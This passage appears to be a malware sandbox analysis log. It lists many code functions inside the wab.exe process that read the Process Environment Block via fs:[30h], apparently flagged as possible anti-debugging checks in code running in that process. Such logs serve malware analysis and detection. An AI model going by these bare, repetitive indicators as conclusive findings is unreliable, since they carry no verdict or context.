Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E50D9 mov eax, dword ptr fs:[00000030h] 12_2_202E50D9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202390DB mov eax, dword ptr fs:[00000030h] 12_2_202390DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20240124 mov eax, dword ptr fs:[00000030h] 12_2_20240124
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20211131 mov eax, dword ptr fs:[00000030h] 12_2_20211131
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20211131 mov eax, dword ptr fs:[00000030h] 12_2_20211131
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020B136 mov eax, dword ptr fs:[00000030h] 12_2_2020B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020B136 mov eax, dword ptr fs:[00000030h] 12_2_2020B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020B136 mov eax, dword ptr fs:[00000030h] 12_2_2020B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020B136 mov eax, dword ptr fs:[00000030h] 12_2_2020B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BA118 mov ecx, dword ptr fs:[00000030h] 12_2_202BA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BA118 mov eax, dword ptr fs:[00000030h] 12_2_202BA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BA118 mov eax, dword ptr fs:[00000030h] 12_2_202BA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BA118 mov eax, dword ptr fs:[00000030h] 12_2_202BA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D0115 mov eax, dword ptr fs:[00000030h] 12_2_202D0115
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h] 12_2_2020F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A9179 mov eax, dword ptr fs:[00000030h] 12_2_202A9179
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20209148 mov eax, dword ptr fs:[00000030h] 12_2_20209148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20209148 mov eax, dword ptr fs:[00000030h] 12_2_20209148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20209148 mov eax, dword ptr fs:[00000030h] 12_2_20209148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20209148 mov eax, dword ptr fs:[00000030h] 12_2_20209148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A4144 mov eax, dword ptr fs:[00000030h] 12_2_202A4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A4144 mov eax, dword ptr fs:[00000030h] 12_2_202A4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A4144 mov ecx, dword ptr fs:[00000030h] 12_2_202A4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A4144 mov eax, dword ptr fs:[00000030h] 12_2_202A4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A4144 mov eax, dword ptr fs:[00000030h] 12_2_202A4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20217152 mov eax, dword ptr fs:[00000030h] 12_2_20217152
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20216154 mov eax, dword ptr fs:[00000030h] 12_2_20216154
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20216154 mov eax, dword ptr fs:[00000030h] 12_2_20216154
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020C156 mov eax, dword ptr fs:[00000030h] 12_2_2020C156
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E5152 mov eax, dword ptr fs:[00000030h] 12_2_202E5152
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C11A4 mov eax, dword ptr fs:[00000030h] 12_2_202C11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C11A4 mov eax, dword ptr fs:[00000030h] 12_2_202C11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C11A4 mov eax, dword ptr fs:[00000030h] 12_2_202C11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C11A4 mov eax, dword ptr fs:[00000030h] 12_2_202C11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022B1B0 mov eax, dword ptr fs:[00000030h] 12_2_2022B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20250185 mov eax, dword ptr fs:[00000030h] 12_2_20250185
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CC188 mov eax, dword ptr fs:[00000030h] 12_2_202CC188
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CC188 mov eax, dword ptr fs:[00000030h] 12_2_202CC188
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029019F mov eax, dword ptr fs:[00000030h] 12_2_2029019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029019F mov eax, dword ptr fs:[00000030h] 12_2_2029019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029019F mov eax, dword ptr fs:[00000030h] 12_2_2029019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029019F mov eax, dword ptr fs:[00000030h] 12_2_2029019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20267190 mov eax, dword ptr fs:[00000030h] 12_2_20267190
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020A197 mov eax, dword ptr fs:[00000030h] 12_2_2020A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020A197 mov eax, dword ptr fs:[00000030h] 12_2_2020A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020A197 mov eax, dword ptr fs:[00000030h] 12_2_2020A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E61E5 mov eax, dword ptr fs:[00000030h] 12_2_202E61E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202351EF mov eax, dword ptr fs:[00000030h] 12_2_202351EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202151ED mov eax, dword ptr fs:[00000030h] 12_2_202151ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202401F8 mov eax, dword ptr fs:[00000030h] 12_2_202401F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E51CB mov eax, dword ptr fs:[00000030h] 12_2_202E51CB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D61C3 mov eax, dword ptr fs:[00000030h] 12_2_202D61C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D61C3 mov eax, dword ptr fs:[00000030h] 12_2_202D61C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024D1D0 mov eax, dword ptr fs:[00000030h] 12_2_2024D1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024D1D0 mov ecx, dword ptr fs:[00000030h] 12_2_2024D1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E5227 mov eax, dword ptr fs:[00000030h] 12_2_202E5227
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020823B mov eax, dword ptr fs:[00000030h] 12_2_2020823B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20247208 mov eax, dword ptr fs:[00000030h] 12_2_20247208
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20247208 mov eax, dword ptr fs:[00000030h] 12_2_20247208
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20214260 mov eax, dword ptr fs:[00000030h] 12_2_20214260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20214260 mov eax, dword ptr fs:[00000030h] 12_2_20214260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20214260 mov eax, dword ptr fs:[00000030h] 12_2_20214260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DD26B mov eax, dword ptr fs:[00000030h] 12_2_202DD26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DD26B mov eax, dword ptr fs:[00000030h] 12_2_202DD26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020826B mov eax, dword ptr fs:[00000030h] 12_2_2020826B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20251270 mov eax, dword ptr fs:[00000030h] 12_2_20251270
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20251270 mov eax, dword ptr fs:[00000030h] 12_2_20251270
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20239274 mov eax, dword ptr fs:[00000030h] 12_2_20239274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h] 12_2_202C0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20209240 mov eax, dword ptr fs:[00000030h] 12_2_20209240
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20209240 mov eax, dword ptr fs:[00000030h] 12_2_20209240
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024724D mov eax, dword ptr fs:[00000030h] 12_2_2024724D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020A250 mov eax, dword ptr fs:[00000030h] 12_2_2020A250
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20216259 mov eax, dword ptr fs:[00000030h] 12_2_20216259
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CB256 mov eax, dword ptr fs:[00000030h] 12_2_202CB256
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CB256 mov eax, dword ptr fs:[00000030h] 12_2_202CB256
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202202A0 mov eax, dword ptr fs:[00000030h] 12_2_202202A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202202A0 mov eax, dword ptr fs:[00000030h] 12_2_202202A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202252A0 mov eax, dword ptr fs:[00000030h] 12_2_202252A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202252A0 mov eax, dword ptr fs:[00000030h] 12_2_202252A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202252A0 mov eax, dword ptr fs:[00000030h] 12_2_202252A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202252A0 mov eax, dword ptr fs:[00000030h] 12_2_202252A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A72A0 mov eax, dword ptr fs:[00000030h] 12_2_202A72A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A72A0 mov eax, dword ptr fs:[00000030h] 12_2_202A72A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h] 12_2_202A62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A62A0 mov ecx, dword ptr fs:[00000030h] 12_2_202A62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h] 12_2_202A62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h] 12_2_202A62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h] 12_2_202A62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h] 12_2_202A62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D92A6 mov eax, dword ptr fs:[00000030h] 12_2_202D92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D92A6 mov eax, dword ptr fs:[00000030h] 12_2_202D92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D92A6 mov eax, dword ptr fs:[00000030h] 12_2_202D92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D92A6 mov eax, dword ptr fs:[00000030h] 12_2_202D92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202992BC mov eax, dword ptr fs:[00000030h] 12_2_202992BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202992BC mov eax, dword ptr fs:[00000030h] 12_2_202992BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202992BC mov ecx, dword ptr fs:[00000030h] 12_2_202992BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202992BC mov ecx, dword ptr fs:[00000030h] 12_2_202992BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E284 mov eax, dword ptr fs:[00000030h] 12_2_2024E284
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E284 mov eax, dword ptr fs:[00000030h] 12_2_2024E284
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20290283 mov eax, dword ptr fs:[00000030h] 12_2_20290283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20290283 mov eax, dword ptr fs:[00000030h] 12_2_20290283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20290283 mov eax, dword ptr fs:[00000030h] 12_2_20290283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E5283 mov eax, dword ptr fs:[00000030h] 12_2_202E5283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024329E mov eax, dword ptr fs:[00000030h] 12_2_2024329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024329E mov eax, dword ptr fs:[00000030h] 12_2_2024329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h] 12_2_202C12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202202E1 mov eax, dword ptr fs:[00000030h] 12_2_202202E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202202E1 mov eax, dword ptr fs:[00000030h] 12_2_202202E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202202E1 mov eax, dword ptr fs:[00000030h] 12_2_202202E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E52E2 mov eax, dword ptr fs:[00000030h] 12_2_202E52E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CF2F8 mov eax, dword ptr fs:[00000030h] 12_2_202CF2F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202092FF mov eax, dword ptr fs:[00000030h] 12_2_202092FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h] 12_2_2021A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h] 12_2_2021A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h] 12_2_2021A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h] 12_2_2021A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h] 12_2_2021A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h] 12_2_2023B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h] 12_2_2023B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h] 12_2_2023B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h] 12_2_2023B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h] 12_2_2023B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h] 12_2_2023B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h] 12_2_2023B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202192C5 mov eax, dword ptr fs:[00000030h] 12_2_202192C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202192C5 mov eax, dword ptr fs:[00000030h] 12_2_202192C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F2D0 mov eax, dword ptr fs:[00000030h] 12_2_2023F2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F2D0 mov eax, dword ptr fs:[00000030h] 12_2_2023F2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020B2D3 mov eax, dword ptr fs:[00000030h] 12_2_2020B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020B2D3 mov eax, dword ptr fs:[00000030h] 12_2_2020B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020B2D3 mov eax, dword ptr fs:[00000030h] 12_2_2020B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D132D mov eax, dword ptr fs:[00000030h] 12_2_202D132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202D132D mov eax, dword ptr fs:[00000030h] 12_2_202D132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F32A mov eax, dword ptr fs:[00000030h] 12_2_2023F32A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20207330 mov eax, dword ptr fs:[00000030h] 12_2_20207330
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029930B mov eax, dword ptr fs:[00000030h] 12_2_2029930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029930B mov eax, dword ptr fs:[00000030h] 12_2_2029930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029930B mov eax, dword ptr fs:[00000030h] 12_2_2029930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024A30B mov eax, dword ptr fs:[00000030h] 12_2_2024A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024A30B mov eax, dword ptr fs:[00000030h] 12_2_2024A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024A30B mov eax, dword ptr fs:[00000030h] 12_2_2024A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020C310 mov ecx, dword ptr fs:[00000030h] 12_2_2020C310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20230310 mov ecx, dword ptr fs:[00000030h] 12_2_20230310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CF367 mov eax, dword ptr fs:[00000030h] 12_2_202CF367
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20217370 mov eax, dword ptr fs:[00000030h] 12_2_20217370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20217370 mov eax, dword ptr fs:[00000030h] 12_2_20217370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20217370 mov eax, dword ptr fs:[00000030h] 12_2_20217370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202B437C mov eax, dword ptr fs:[00000030h] 12_2_202B437C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
